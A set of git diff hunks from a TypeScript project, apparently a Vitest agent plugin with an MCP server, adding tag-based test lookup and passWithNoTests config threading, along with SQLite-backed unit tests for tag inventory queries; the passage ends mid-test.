+					// Tests-did-not-run vs tests-ran-and-passed is filter-driven, not
+					// result-driven: an empty workspace with no filter is `ok` with
+					// an empty report. The `passWithNoTests` policy controls
+					// pass/fail classification only — it never reshapes the
+					// discriminator.
+					if (hasFilter && result.testModules.length === 0 && unhandledErrors.length === 0) {
+						return {
+							kind: "no-match" as const,
+							filter: {
+								project: project ?? null,
+								files,
+								tags: tagsInput ?? null,
+								resolvedExpression,
+							},
+						};
+					}
 
 					const reason =
 						unhandledErrors.length > 0 || result.testModules.some((m) => m.state() === "failed") ? "failed" : "passed";

--- a/packages/mcp/src/tools/run-tests.ts
+++ b/packages/mcp/src/tools/run-tests.ts
@@ -483,9 +483,11 @@ export const runTests = publicProcedure
 							// and pass it as a one-element array.
 							...(resolvedExpression !== null ? { tagsFilter: [resolvedExpression] } : {}),
 							// Per-call override of Vitest's native test.passWithNoTests.
-							// When unset on the input, Vitest's project-level value
-							// (already captured by the plugin onto ResolvedReporterConfig)
-							// applies.
+							// When unset on the input we forward nothing, and Vitest
+							// re-resolves the policy from the project config on disk.
+							// The plugin's ResolvedReporterConfig snapshot of the
+							// captured value is informational for consumer reporters
+							// and is not read here.
 							...(input.passWithNoTests !== undefined ? { passWithNoTests: input.passWithNoTests } : {}),
 						},
 						{}, // viteOverrides

--- a/packages/mcp/src/tools/test.ts
+++ b/packages/mcp/src/tools/test.ts
@@ -64,11 +64,24 @@ const TestForFileResult = Schema.Struct({
 	testFiles: Schema.Array(Schema.String),
 }).annotations({ identifier: "TestForFile" });
 
-export const TestResult = Schema.Union(TestListResult, TestGetFound, TestGetMissing, TestForFileResult).annotations({
+const TestForTagResult = Schema.Struct({
+	action: Schema.Literal("for_tag"),
+	tag: Schema.String,
+	count: Schema.Number,
+	groups: Schema.Array(TestListGroup),
+}).annotations({ identifier: "TestForTag" });
+
+export const TestResult = Schema.Union(
+	TestListResult,
+	TestGetFound,
+	TestGetMissing,
+	TestForFileResult,
+	TestForTagResult,
+).annotations({
 	identifier: "TestResult",
 	title: "test result",
 	description:
-		"Discriminate on `action`. `get` further discriminates on `found`. `list` and `for_file` both carry counted arrays.",
+		"Discriminate on `action`. `get` further discriminates on `found`. `list`, `for_file`, and `for_tag` all carry counted arrays — `list` and `for_tag` group by project.",
 });
 export type TestResultType = Schema.Schema.Type<typeof TestResult>;
 
@@ -155,6 +168,31 @@ export const formatTestMarkdown = (data: TestResultType): string => {
 		}
 		return lines.join("\n");
 	}
+	if (data.action === "for_tag") {
+		if (data.count === 0) {
+			return `No tests found tagged \`${data.tag}\`. Use \`inventory({ kind: "tag" })\` to discover available tags.`;
+		}
+		const lines: string[] = [
+			`# Tests tagged \`${data.tag}\``,
+			"",
+			`Found ${data.count} test${data.count === 1 ? "" : "s"} across ${data.groups.length} project${data.groups.length === 1 ? "" : "s"}:`,
+			"",
+		];
+		for (const g of data.groups) {
+			lines.push(
+				`### ${g.project}`,
+				"",
+				"| ID | Full Name | State | Duration | Module |",
+				"| --- | --- | --- | --- | --- |",
+			);
+			for (const t of g.tests) {
+				const duration = t.duration !== null ? `${t.duration}ms` : "—";
+				lines.push(`| ${t.id} | ${t.fullName} | ${t.state} | ${duration} | ${t.module} |`);
+			}
+			lines.push("");
+		}
+		return lines.join("\n").trimEnd();
+	}
 	// for_file
 	if (data.count === 0) {
 		return `No test modules found covering \`${data.filePath}\`. Run run_tests({}) to populate the database, or check the file path.`;
@@ -194,7 +232,13 @@ const ForFileVariant = Schema.Struct({
 	filePath: Schema.String,
 });
 
-const TestInput = Schema.Union(ListVariant, GetVariant, ForFileVariant);
+const ForTagVariant = Schema.Struct({
+	action: Schema.Literal("for_tag"),
+	tag: Schema.String,
+	project: Schema.optional(Schema.String),
+});
+
+const TestInput = Schema.Union(ListVariant, GetVariant, ForFileVariant, ForTagVariant);
 
 export const test = publicProcedure
 	.input(Schema.standardSchemaV1(TestInput))
@@ -264,6 +308,27 @@ export const test = publicProcedure
 								count: testFiles.length,
 								testFiles,
 							};
+						}),
+					for_tag: (variant) =>
+						Effect.gen(function* () {
+							const reader = yield* DataReader;
+							// Mirrors the `list` action: when project is omitted, iterate
+							// every known project's latest run and emit a per-project group
+							// for each non-empty result; when supplied, return at most one
+							// group.
+							const targets: ReadonlyArray<{ project: string }> = variant.project
+								? [{ project: variant.project }]
+								: yield* reader.getRunsByProject().pipe(Effect.map((rs) => rs.map((r) => ({ project: r.project }))));
+							const groups: Array<Schema.Schema.Type<typeof TestListGroup>> = [];
+							let total = 0;
+							for (const t of targets) {
+								const tests = yield* reader.listTestsForTag(variant.tag, { project: t.project });
+								if (tests.length > 0) {
+									groups.push({ project: t.project, tests });
+									total += tests.length;
+								}
+							}
+							return { action: "for_tag" as const, tag: variant.tag, count: total, groups };
 						}),
 				}),
 			),

--- a/packages/plugin/__test__/plugin.test.ts
+++ b/packages/plugin/__test__/plugin.test.ts
@@ -9,6 +9,7 @@ function mockVitest(
 	overrides?: {
 		thresholds?: Record<string, unknown>;
 		outputFile?: string | Record<string, string>;
+		passWithNoTests?: boolean;
 	},
 ) {
 	const coverage: { thresholds?: Record<string, unknown> } = {};
@@ -19,9 +20,13 @@ function mockVitest(
 		reporters: unknown[];
 		coverage: { thresholds?: Record<string, unknown> };
 		outputFile?: string | Record<string, string>;
+		passWithNoTests?: boolean;
 	} = { reporters, coverage };
 	if (overrides?.outputFile !== undefined) {
 		config.outputFile = overrides.outputFile;
+	}
+	if (overrides?.passWithNoTests !== undefined) {
+		config.passWithNoTests = overrides.passWithNoTests;
 	}
 	return {
 		config,
@@ -362,6 +367,42 @@ describe("AgentPlugin", () => {
 			await callConfigureVitest(plugin, vitest);
 			const reporter = vitest.config.reporters.find((r) => r instanceof AgentReporter) as AgentReporter;
 			expect(reporter.resolvedConfig.transport).toEqual({ kind: "local" });
+		});
+	});
+
+	describe("passWithNoTests threading", () => {
+		it("threads test.passWithNoTests=true from the resolved Vitest config onto ResolvedReporterConfig", async () => {
+			const plugin = AgentPlugin({}, EnvironmentDetectorTest.layer("agent-shell"));
+			const vitest = mockVitest(["agent"], { passWithNoTests: true });
+			await callConfigureVitest(plugin, vitest);
+			const reporter = vitest.config.reporters.find((r) => r instanceof AgentReporter) as AgentReporter;
+			expect(reporter.resolvedConfig.passWithNoTests).toBe(true);
+		});
+
+		it("threads test.passWithNoTests=false from the resolved Vitest config onto ResolvedReporterConfig", async () => {
+			const plugin = AgentPlugin({}, EnvironmentDetectorTest.layer("agent-shell"));
+			const vitest = mockVitest(["agent"], { passWithNoTests: false });
+			await callConfigureVitest(plugin, vitest);
+			const reporter = vitest.config.reporters.find((r) => r instanceof AgentReporter) as AgentReporter;
+			expect(reporter.resolvedConfig.passWithNoTests).toBe(false);
+		});
+
+		it("leaves passWithNoTests undefined when the field is absent from the Vitest config", async () => {
+			const plugin = AgentPlugin({}, EnvironmentDetectorTest.layer("agent-shell"));
+			const vitest = mockVitest(["agent"]);
+			await callConfigureVitest(plugin, vitest);
+			const reporter = vitest.config.reporters.find((r) => r instanceof AgentReporter) as AgentReporter;
+			expect(reporter.resolvedConfig.passWithNoTests).toBeUndefined();
+		});
+
+		it("does not surface passWithNoTests when the Vitest config carries a non-boolean value", async () => {
+			const plugin = AgentPlugin({}, EnvironmentDetectorTest.layer("agent-shell"));
+			const vitest = mockVitest(["agent"]);
+			// Simulate a malformed config that slipped past Vitest's own typing
+			(vitest.config as { passWithNoTests?: unknown }).passWithNoTests = "yes";
+			await callConfigureVitest(plugin, vitest);
+			const reporter = vitest.config.reporters.find((r) => r instanceof AgentReporter) as AgentReporter;
+			expect(reporter.resolvedConfig.passWithNoTests).toBeUndefined();
 		});
 	});
 

--- a/packages/plugin/src/plugin.ts
+++ b/packages/plugin/src/plugin.ts
@@ -400,9 +400,12 @@ export function AgentPlugin(options: AgentPluginConstructorOptions = {}, _layer?
 				log("transport.kind:", transport.kind);
 
 				// Capture Vitest's native `test.passWithNoTests` (Vitest's own
-				// default is `false`). Threaded onto ResolvedReporterConfig as
-				// the project-level default for the MCP `run_tests` tool; the
-				// MCP layer's per-call override wins when supplied.
+				// default is `false`) and forward it onto ResolvedReporterConfig
+				// so consumer reporters / UIs can render the resolved policy
+				// alongside other run context. The MCP `run_tests` tool does
+				// not read this snapshot — when its per-call override is unset
+				// the tool forwards nothing to `createVitest` and Vitest
+				// re-resolves the policy from the project config on disk.
 				const passWithNoTestsRaw = (vitest.config as { passWithNoTests?: unknown }).passWithNoTests;
 				const passWithNoTests = typeof passWithNoTestsRaw === "boolean" ? passWithNoTestsRaw : undefined;
 				log("passWithNoTests (resolved):", passWithNoTests);

--- a/packages/plugin/src/plugin.ts
+++ b/packages/plugin/src/plugin.ts
@@ -92,9 +92,9 @@ export interface AgentPluginConstructorOptions extends AgentPluginOptions {
  *
  * Per-slot defaults:
  * - `human` → `passthrough` (Vitest's own reporters do the visible work).
- *   Users opt into `ink` for live animation by setting `console.human:
- *   "ink"`; the plugin's internal AgentReporter owns the live Ink mount
- *   (T6 contract — users do not import or wire `createLiveInk`
+ *   Users opt into `ink` for live animation by setting the `human` slot
+ *   to `"ink"`; the plugin's internal AgentReporter owns the live Ink
+ *   mount (T6 contract — users do not import or wire `createLiveInk`
  *   themselves; that symbol is internal to vitest-agent-ui).
  * - `agent` → `agent` (markdown-flavored final-frame string).
  * - `ci` → `passthrough` (Vitest's reporters produce log-friendly output;

--- a/packages/plugin/src/plugin.ts
+++ b/packages/plugin/src/plugin.ts
@@ -399,6 +399,14 @@ export function AgentPlugin(options: AgentPluginConstructorOptions = {}, _layer?
 				const transport: Transport = options.transport ?? { kind: "local" };
 				log("transport.kind:", transport.kind);
 
+				// Capture Vitest's native `test.passWithNoTests` (Vitest's own
+				// default is `false`). Threaded onto ResolvedReporterConfig as
+				// the project-level default for the MCP `run_tests` tool; the
+				// MCP layer's per-call override wins when supplied.
+				const passWithNoTestsRaw = (vitest.config as { passWithNoTests?: unknown }).passWithNoTests;
+				const passWithNoTests = typeof passWithNoTestsRaw === "boolean" ? passWithNoTestsRaw : undefined;
+				log("passWithNoTests (resolved):", passWithNoTests);
+
 				// Push exactly one aggregating reporter per Vitest run. The
 				// terminal/markdown formatters render all projects in one block
 				// (Projects header + per-project rows + one Total), so a single
@@ -423,6 +431,7 @@ export function AgentPlugin(options: AgentPluginConstructorOptions = {}, _layer?
 					mcp,
 					githubActions,
 					transport,
+					...(passWithNoTests !== undefined ? { passWithNoTests } : {}),
 					...(options.reporter !== undefined && { reporter: options.reporter }),
 					// onRunEvent is the user-facing tee on the plugin's run-event
 					// stream (T6 contract). Forward it unconditionally so the

--- a/packages/plugin/src/reporter.ts
+++ b/packages/plugin/src/reporter.ts
@@ -163,9 +163,11 @@ interface ResolvedOptions {
 	transport: Transport;
 	/**
 	 * Project-level `test.passWithNoTests` captured from the resolved
-	 * Vitest config. Forwarded onto `ResolvedReporterConfig` so the MCP
-	 * `run_tests` tool can fall back to the project default when its
-	 * per-call override is unset.
+	 * Vitest config and forwarded onto `ResolvedReporterConfig` for
+	 * consumer reporters / UIs that want to render the resolved policy.
+	 * The MCP `run_tests` tool does not read this snapshot — when its
+	 * per-call override is unset the tool forwards nothing to
+	 * `createVitest` and Vitest re-resolves from the project config.
 	 */
 	passWithNoTests?: boolean;
 }

--- a/packages/plugin/src/reporter.ts
+++ b/packages/plugin/src/reporter.ts
@@ -161,6 +161,13 @@ interface ResolvedOptions {
 	coverageMode: "full" | "ui-only";
 	/** Transport binding threaded onto ResolvedReporterConfig for custom reporters. */
 	transport: Transport;
+	/**
+	 * Project-level `test.passWithNoTests` captured from the resolved
+	 * Vitest config. Forwarded onto `ResolvedReporterConfig` so the MCP
+	 * `run_tests` tool can fall back to the project default when its
+	 * per-call override is unset.
+	 */
+	passWithNoTests?: boolean;
 }
 
 /**
@@ -205,6 +212,13 @@ export interface AgentReporterConstructorOptions extends AgentReporterOptions {
 	mcp?: boolean;
 	githubActions?: boolean;
 	transport?: Transport;
+	/**
+	 * Optional `test.passWithNoTests` value the plugin captured from the
+	 * resolved Vitest config. The reporter forwards it onto the
+	 * `ResolvedReporterConfig` it surfaces to renderers and the MCP
+	 * `run_tests` tool.
+	 */
+	passWithNoTests?: boolean;
 	coverageThresholds?: ResolvedThresholds | Record<string, unknown>;
 	coverageTargets?: ResolvedThresholds | Record<string, unknown>;
 	/**
@@ -368,6 +382,7 @@ export class AgentReporter {
 			reporter: options.reporter ?? _defaultReporter,
 			coverageMode: options.coverageMode ?? "full",
 			transport: options.transport ?? { kind: "local" },
+			...(options.passWithNoTests !== undefined ? { passWithNoTests: options.passWithNoTests } : {}),
 		};
 		this.options = resolvedTargets ? { ...base, coverageTargets: resolvedTargets } : base;
 	}
@@ -398,6 +413,7 @@ export class AgentReporter {
 			transport: opts.transport,
 			...(opts.coverageThresholds !== undefined && { coverageThresholds: opts.coverageThresholds }),
 			...(opts.coverageTargets !== undefined && { coverageTargets: opts.coverageTargets }),
+			...(opts.passWithNoTests !== undefined && { passWithNoTests: opts.passWithNoTests }),
 		};
 	}
 
@@ -791,6 +807,7 @@ export class AgentReporter {
 					...(opts.projectFilter !== undefined && { projectFilter: opts.projectFilter }),
 					...(opts.coverageThresholds !== undefined && { coverageThresholds: opts.coverageThresholds }),
 					...(opts.coverageTargets !== undefined && { coverageTargets: opts.coverageTargets }),
+					...(opts.passWithNoTests !== undefined && { passWithNoTests: opts.passWithNoTests }),
 					coverageMode: opts.coverageMode,
 				});
 
@@ -1391,6 +1408,7 @@ export class AgentReporter {
 				...(opts.projectFilter !== undefined && { projectFilter: opts.projectFilter }),
 				...(opts.coverageThresholds !== undefined && { coverageThresholds: opts.coverageThresholds }),
 				...(opts.coverageTargets !== undefined && { coverageTargets: opts.coverageTargets }),
+				...(opts.passWithNoTests !== undefined && { passWithNoTests: opts.passWithNoTests }),
 				coverageMode: opts.coverageMode,
 			});
 

--- a/packages/plugin/src/utils/build-reporter-kit.ts
+++ b/packages/plugin/src/utils/build-reporter-kit.ts
@@ -48,8 +48,9 @@ export interface BuildReporterKitInput {
 	/**
 	 * Project-level `test.passWithNoTests` value captured from the
 	 * resolved Vitest config. Threaded onto {@link ResolvedReporterConfig}
-	 * so the MCP `run_tests` tool can read the project default when its
-	 * per-call override is unset.
+	 * for consumer reporters / UIs that want to render the resolved
+	 * policy. The MCP `run_tests` tool does not read this snapshot — see
+	 * the field docstring on `ResolvedReporterConfig` for the full note.
 	 */
 	readonly passWithNoTests?: boolean;
 }

--- a/packages/plugin/src/utils/build-reporter-kit.ts
+++ b/packages/plugin/src/utils/build-reporter-kit.ts
@@ -45,6 +45,13 @@ export interface BuildReporterKitInput {
 	readonly coverageTargets?: ResolvedReporterConfig["coverageTargets"];
 	readonly coverageMode: ResolvedReporterConfig["coverageMode"];
 	readonly transport: Transport;
+	/**
+	 * Project-level `test.passWithNoTests` value captured from the
+	 * resolved Vitest config. Threaded onto {@link ResolvedReporterConfig}
+	 * so the MCP `run_tests` tool can read the project default when its
+	 * per-call override is unset.
+	 */
+	readonly passWithNoTests?: boolean;
 }
 
 export const buildReporterKit = (input: BuildReporterKitInput): ReporterKit => {
@@ -78,6 +85,7 @@ export const buildReporterKit = (input: BuildReporterKitInput): ReporterKit => {
 		...(input.runCommand !== undefined && { runCommand: input.runCommand }),
 		...(input.coverageThresholds !== undefined && { coverageThresholds: input.coverageThresholds }),
 		...(input.coverageTargets !== undefined && { coverageTargets: input.coverageTargets }),
+		...(input.passWithNoTests !== undefined && { passWithNoTests: input.passWithNoTests }),
 	};
 
 	// OSC-8 is enabled when running interactively (terminal/agent-shell) and

--- a/packages/sdk/__test__/data-reader-tags.test.ts
+++ b/packages/sdk/__test__/data-reader-tags.test.ts
@@ -88,11 +88,70 @@ describe("TagInventoryRow type export", () => {
 		const row: TagInventoryRow = {
 			tag: "int",
 			project: "my-proj",
+			moduleCount: 2,
 			testCount: 3,
 		};
 		expect(row.tag).toBe("int");
 		expect(row.project).toBe("my-proj");
+		expect(row.moduleCount).toBe(2);
 		expect(row.testCount).toBe(3);
+	});
+});
+
+// ─── moduleCount: distinct-module aggregation ────────────────────────────────
+
+describe("listTagInventory — moduleCount aggregation", () => {
+	it("should count distinct test modules carrying the tag, not test cases", async () => {
+		const result = await run(
+			Effect.gen(function* () {
+				const store = yield* DataStore;
+				const reader = yield* DataReader;
+
+				yield* store.writeSettings("tag-mc-hash", settingsInput, {});
+
+				const runId = yield* store.writeRun({
+					...baseRunInput,
+					invocationId: "tag-mc",
+					project: "proj-mc",
+					settingsHash: "tag-mc-hash",
+				});
+
+				const fileOne = yield* store.ensureFile("src/mc-one.test.ts");
+				const fileTwo = yield* store.ensureFile("src/mc-two.test.ts");
+				const fileThree = yield* store.ensureFile("src/mc-three.test.ts");
+				const [modOne, modTwo, modThree] = yield* store.writeModules(runId, [
+					{ fileId: fileOne, relativeModuleId: "src/mc-one.test.ts", state: "passed", duration: 10 },
+					{ fileId: fileTwo, relativeModuleId: "src/mc-two.test.ts", state: "passed", duration: 10 },
+					{ fileId: fileThree, relativeModuleId: "src/mc-three.test.ts", state: "passed", duration: 10 },
+				]);
+
+				// mc-one: two int-tagged tests in the same module → contributes 1 module, 2 tests.
+				yield* store.writeTestCases(modOne, [
+					{ name: "int one a", fullName: "mc-one > int a", state: "passed", tags: ["int"] },
+					{ name: "int one b", fullName: "mc-one > int b", state: "passed", tags: ["int"] },
+				]);
+				// mc-two: one int-tagged test → +1 module, +1 test.
+				yield* store.writeTestCases(modTwo, [
+					{ name: "int two", fullName: "mc-two > int", state: "passed", tags: ["int"] },
+				]);
+				// mc-three: no int tag → does not contribute to int's counts.
+				yield* store.writeTestCases(modThree, [
+					{ name: "unit three", fullName: "mc-three > unit", state: "passed", tags: ["unit"] },
+				]);
+
+				return yield* reader.listTagInventory({ project: "proj-mc" });
+			}),
+		);
+
+		const intRow = result.find((r) => r.tag === "int");
+		expect(intRow).toBeDefined();
+		expect(intRow?.moduleCount).toBe(2);
+		expect(intRow?.testCount).toBe(3);
+
+		const unitRow = result.find((r) => r.tag === "unit");
+		expect(unitRow).toBeDefined();
+		expect(unitRow?.moduleCount).toBe(1);
+		expect(unitRow?.testCount).toBe(1);
 	});
 });
 
@@ -173,14 +232,17 @@ describe("listTagInventory — unscoped", () => {
 		const intA = result.find((r) => r.tag === "int" && r.project === "proj-a");
 		expect(intA).toBeDefined();
 		expect(intA?.testCount).toBe(1);
+		expect(intA?.moduleCount).toBe(1);
 
 		const e2eA = result.find((r) => r.tag === "e2e" && r.project === "proj-a");
 		expect(e2eA).toBeDefined();
 		expect(e2eA?.testCount).toBe(1);
+		expect(e2eA?.moduleCount).toBe(1);
 
 		const intB = result.find((r) => r.tag === "int" && r.project === "proj-b");
 		expect(intB).toBeDefined();
 		expect(intB?.testCount).toBe(1);
+		expect(intB?.moduleCount).toBe(1);
 	});
 });
 
@@ -235,6 +297,10 @@ describe("listTagInventory — project scoped", () => {
 		expect(result.length).toBe(2);
 		const tags = result.map((r) => r.tag).sort();
 		expect(tags).toEqual(["int", "unit"]);
+		for (const r of result) {
+			expect(r.moduleCount).toBe(1);
+			expect(r.testCount).toBe(1);
+		}
 	});
 });
 

--- a/packages/sdk/__test__/data-reader-tags.test.ts
+++ b/packages/sdk/__test__/data-reader-tags.test.ts
@@ -1,0 +1,402 @@
+/**
+ * Unit tests for listTagInventory and listTestsForTag on DataReaderLive.
+ *
+ * Covers:
+ *   (1) listTagInventory() unscoped returns one row per (tag, project) pair
+ *       from the tags / test_case_tags tables, latest run per project.
+ *   (2) listTagInventory({ project }) filters to that project's latest run.
+ *   (3) listTestsForTag("int") returns TestListEntry rows from each project's
+ *       latest run.
+ *   (4) listTestsForTag("int", { project }) scopes to one project.
+ *   (5) Empty tag set returns [].
+ *   (6) Tags belonging only to older runs are excluded.
+ */
+import * as NodeContext from "@effect/platform-node/NodeContext";
+import type { SqlClient } from "@effect/sql/SqlClient";
+import { layer as sqliteClientLayer } from "@effect/sql-sqlite-node/SqliteClient";
+import * as SqliteMigrator from "@effect/sql-sqlite-node/SqliteMigrator";
+import { Effect, Layer } from "effect";
+import { describe, expect, it } from "vitest";
+import { DataReaderLive } from "../src/layers/DataReaderLive.js";
+import { DataStoreLive } from "../src/layers/DataStoreLive.js";
+import migration0001 from "../src/migrations/0001_initial.js";
+import type { TagInventoryRow } from "../src/services/DataReader.js";
+import { DataReader } from "../src/services/DataReader.js";
+import { DataStore } from "../src/services/DataStore.js";
+
+const SqliteLayer = sqliteClientLayer({ filename: ":memory:" });
+const PlatformLayer = NodeContext.layer;
+
+const MigratorLayer = SqliteMigrator.layer({
+	loader: SqliteMigrator.fromRecord({
+		"0001_initial": migration0001,
+	}),
+}).pipe(Layer.provide(Layer.merge(SqliteLayer, PlatformLayer)));
+
+const TestLayer = Layer.mergeAll(
+	DataStoreLive.pipe(Layer.provide(SqliteLayer)),
+	DataReaderLive.pipe(Layer.provide(SqliteLayer)),
+	MigratorLayer,
+	SqliteLayer,
+	PlatformLayer,
+);
+
+const run = <A, E>(effect: Effect.Effect<A, E, DataStore | DataReader | SqlClient>) =>
+	Effect.runPromise(Effect.provide(effect, TestLayer));
+
+// Shared settings fixture
+const settingsHash = "tag-test-hash";
+const settingsInput = {
+	vitestVersion: "3.2.0",
+	pool: "forks",
+	environment: "node",
+	testTimeout: 5000,
+	hookTimeout: 10000,
+	slowTestThreshold: 300,
+	maxConcurrency: 5,
+	maxWorkers: 4,
+	isolate: true,
+	bail: 0,
+	globals: false,
+	fileParallelism: true,
+	sequenceSeed: 42,
+	coverageProvider: "v8",
+};
+
+const baseRunInput = {
+	invocationId: "tag-inv-001",
+	project: "tag-proj",
+	settingsHash,
+	timestamp: "2026-05-01T00:00:00.000Z",
+	commitSha: "abc123",
+	branch: "main",
+	reason: "passed" as const,
+	duration: 500,
+	total: 2,
+	passed: 2,
+	failed: 0,
+	skipped: 0,
+	scoped: false,
+};
+
+// ─── Behavior 1 + structural ─────────────────────────────────────────────────
+
+describe("TagInventoryRow type export", () => {
+	it("should export TagInventoryRow type from the DataReader service module", () => {
+		// If TagInventoryRow is exported, this type assertion compiles.
+		// At runtime we just verify the import resolves (no undefined import).
+		const row: TagInventoryRow = {
+			tag: "int",
+			project: "my-proj",
+			testCount: 3,
+		};
+		expect(row.tag).toBe("int");
+		expect(row.project).toBe("my-proj");
+		expect(row.testCount).toBe(3);
+	});
+});
+
+// ─── Behavior 5: empty tag set returns [] ────────────────────────────────────
+
+describe("listTagInventory — empty tag set", () => {
+	it("should return empty array when no tests have tags", async () => {
+		const result = await run(
+			Effect.gen(function* () {
+				const store = yield* DataStore;
+				const reader = yield* DataReader;
+
+				yield* store.writeSettings(settingsHash, settingsInput, {});
+				const runId = yield* store.writeRun(baseRunInput);
+				const fileId = yield* store.ensureFile("src/no-tags.test.ts");
+				const [moduleId] = yield* store.writeModules(runId, [
+					{ fileId, relativeModuleId: "src/no-tags.test.ts", state: "passed", duration: 100 },
+				]);
+				yield* store.writeTestCases(moduleId, [
+					{ name: "untagged test", fullName: "suite > untagged test", state: "passed" },
+				]);
+
+				return yield* reader.listTagInventory();
+			}),
+		);
+		expect(result).toEqual([]);
+	});
+});
+
+// ─── Behavior 1: unscoped listTagInventory ───────────────────────────────────
+
+describe("listTagInventory — unscoped", () => {
+	it("should return one row per tag-project pair from the latest run when called without project filter", async () => {
+		const result = await run(
+			Effect.gen(function* () {
+				const store = yield* DataStore;
+				const reader = yield* DataReader;
+
+				// Project A — two tests, one tagged "int", one tagged "e2e"
+				yield* store.writeSettings("tag-unsco-hash", settingsInput, {});
+				const runA = yield* store.writeRun({
+					...baseRunInput,
+					invocationId: "tag-unsco-a",
+					project: "proj-a",
+					settingsHash: "tag-unsco-hash",
+				});
+				const fileA = yield* store.ensureFile("src/a.test.ts");
+				const [modA] = yield* store.writeModules(runA, [
+					{ fileId: fileA, relativeModuleId: "src/a.test.ts", state: "passed", duration: 50 },
+				]);
+				yield* store.writeTestCases(modA, [
+					{ name: "int test 1", fullName: "suite > int test 1", state: "passed", tags: ["int"] },
+					{ name: "e2e test 1", fullName: "suite > e2e test 1", state: "passed", tags: ["e2e"] },
+				]);
+
+				// Project B — one test tagged "int"
+				const runB = yield* store.writeRun({
+					...baseRunInput,
+					invocationId: "tag-unsco-b",
+					project: "proj-b",
+					settingsHash: "tag-unsco-hash",
+				});
+				const fileB = yield* store.ensureFile("src/b.test.ts");
+				const [modB] = yield* store.writeModules(runB, [
+					{ fileId: fileB, relativeModuleId: "src/b.test.ts", state: "passed", duration: 30 },
+				]);
+				yield* store.writeTestCases(modB, [
+					{ name: "int test b", fullName: "suite > int test b", state: "passed", tags: ["int"] },
+				]);
+
+				return yield* reader.listTagInventory();
+			}),
+		);
+
+		// Expect 3 rows: (int, proj-a), (e2e, proj-a), (int, proj-b)
+		expect(result.length).toBe(3);
+
+		const intA = result.find((r) => r.tag === "int" && r.project === "proj-a");
+		expect(intA).toBeDefined();
+		expect(intA?.testCount).toBe(1);
+
+		const e2eA = result.find((r) => r.tag === "e2e" && r.project === "proj-a");
+		expect(e2eA).toBeDefined();
+		expect(e2eA?.testCount).toBe(1);
+
+		const intB = result.find((r) => r.tag === "int" && r.project === "proj-b");
+		expect(intB).toBeDefined();
+		expect(intB?.testCount).toBe(1);
+	});
+});
+
+// ─── Behavior 2: project-scoped listTagInventory ─────────────────────────────
+
+describe("listTagInventory — project scoped", () => {
+	it("should return only rows for the specified project when called with project filter", async () => {
+		const result = await run(
+			Effect.gen(function* () {
+				const store = yield* DataStore;
+				const reader = yield* DataReader;
+
+				yield* store.writeSettings("tag-scope-hash", settingsInput, {});
+
+				// proj-x: tagged "int" and "unit"
+				const runX = yield* store.writeRun({
+					...baseRunInput,
+					invocationId: "tag-scope-x",
+					project: "proj-x",
+					settingsHash: "tag-scope-hash",
+				});
+				const fileX = yield* store.ensureFile("src/x.test.ts");
+				const [modX] = yield* store.writeModules(runX, [
+					{ fileId: fileX, relativeModuleId: "src/x.test.ts", state: "passed", duration: 40 },
+				]);
+				yield* store.writeTestCases(modX, [
+					{ name: "test x1", fullName: "x > test x1", state: "passed", tags: ["int"] },
+					{ name: "test x2", fullName: "x > test x2", state: "passed", tags: ["unit"] },
+				]);
+
+				// proj-y: tagged "e2e"
+				const runY = yield* store.writeRun({
+					...baseRunInput,
+					invocationId: "tag-scope-y",
+					project: "proj-y",
+					settingsHash: "tag-scope-hash",
+				});
+				const fileY = yield* store.ensureFile("src/y.test.ts");
+				const [modY] = yield* store.writeModules(runY, [
+					{ fileId: fileY, relativeModuleId: "src/y.test.ts", state: "passed", duration: 25 },
+				]);
+				yield* store.writeTestCases(modY, [
+					{ name: "test y1", fullName: "y > test y1", state: "passed", tags: ["e2e"] },
+				]);
+
+				return yield* reader.listTagInventory({ project: "proj-x" });
+			}),
+		);
+
+		// Only proj-x rows
+		expect(result.every((r) => r.project === "proj-x")).toBe(true);
+		expect(result.length).toBe(2);
+		const tags = result.map((r) => r.tag).sort();
+		expect(tags).toEqual(["int", "unit"]);
+	});
+});
+
+// ─── Behavior 3: unscoped listTestsForTag ────────────────────────────────────
+
+describe("listTestsForTag — unscoped", () => {
+	it("should return TestListEntry rows for tests tagged with the given tag from the latest run of each project", async () => {
+		const result = await run(
+			Effect.gen(function* () {
+				const store = yield* DataStore;
+				const reader = yield* DataReader;
+
+				yield* store.writeSettings("tag-tft-hash", settingsInput, {});
+
+				// proj-alpha: two tests — one with "int", one without
+				const runAlpha = yield* store.writeRun({
+					...baseRunInput,
+					invocationId: "tag-tft-alpha",
+					project: "proj-alpha",
+					settingsHash: "tag-tft-hash",
+				});
+				const fileAlpha = yield* store.ensureFile("src/alpha.test.ts");
+				const [modAlpha] = yield* store.writeModules(runAlpha, [
+					{ fileId: fileAlpha, relativeModuleId: "src/alpha.test.ts", state: "passed", duration: 60 },
+				]);
+				yield* store.writeTestCases(modAlpha, [
+					{ name: "int alpha", fullName: "alpha > int alpha", state: "passed", tags: ["int"] },
+					{ name: "plain alpha", fullName: "alpha > plain alpha", state: "passed" },
+				]);
+
+				// proj-beta: one test with "int"
+				const runBeta = yield* store.writeRun({
+					...baseRunInput,
+					invocationId: "tag-tft-beta",
+					project: "proj-beta",
+					settingsHash: "tag-tft-hash",
+				});
+				const fileBeta = yield* store.ensureFile("src/beta.test.ts");
+				const [modBeta] = yield* store.writeModules(runBeta, [
+					{ fileId: fileBeta, relativeModuleId: "src/beta.test.ts", state: "passed", duration: 35 },
+				]);
+				yield* store.writeTestCases(modBeta, [
+					{ name: "int beta", fullName: "beta > int beta", state: "passed", tags: ["int"] },
+				]);
+
+				return yield* reader.listTestsForTag("int");
+			}),
+		);
+
+		// Should return exactly the two "int"-tagged tests
+		expect(result.length).toBe(2);
+		const fullNames = result.map((t) => t.fullName).sort();
+		expect(fullNames).toEqual(["alpha > int alpha", "beta > int beta"]);
+
+		// Each entry should have TestListEntry shape
+		for (const entry of result) {
+			expect(typeof entry.id).toBe("number");
+			expect(typeof entry.fullName).toBe("string");
+			expect(typeof entry.state).toBe("string");
+			expect(typeof entry.module).toBe("string");
+		}
+	});
+});
+
+// ─── Behavior 4: project-scoped listTestsForTag ──────────────────────────────
+
+describe("listTestsForTag — project scoped", () => {
+	it("should return only tests from the specified project when called with project option", async () => {
+		const result = await run(
+			Effect.gen(function* () {
+				const store = yield* DataStore;
+				const reader = yield* DataReader;
+
+				yield* store.writeSettings("tag-tft-scope-hash", settingsInput, {});
+
+				// proj-p: test with "int"
+				const runP = yield* store.writeRun({
+					...baseRunInput,
+					invocationId: "tag-tft-p",
+					project: "proj-p",
+					settingsHash: "tag-tft-scope-hash",
+				});
